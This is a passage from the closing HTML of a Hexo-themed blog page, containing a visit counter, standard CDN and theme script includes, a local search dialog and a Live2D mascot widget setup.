id="busuanzi_container_page_pv"><i class="fa fa-file-o"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.6.1"></script><script src="/js/fancybox.js?version=1.6.1"></script><script src="/js/sidebar.js?version=1.6.1"></script><script src="/js/copy.js?version=1.6.1"></script><script src="/js/fireworks.js?version=1.6.1"></script><script src="/js/transition.js?version=1.6.1"></script><script src="/js/scroll.js?version=1.6.1"></script><script src="/js/head.js?version=1.6.1"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">Local search</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="Search for Posts"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>Powered by</span> <a href="https://github.com/wzpan/hexo-generator-search" target="_blank" rel="noopener" style="color:#49B1F5;">hexo-generator-search</a></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true}});</script></body></html>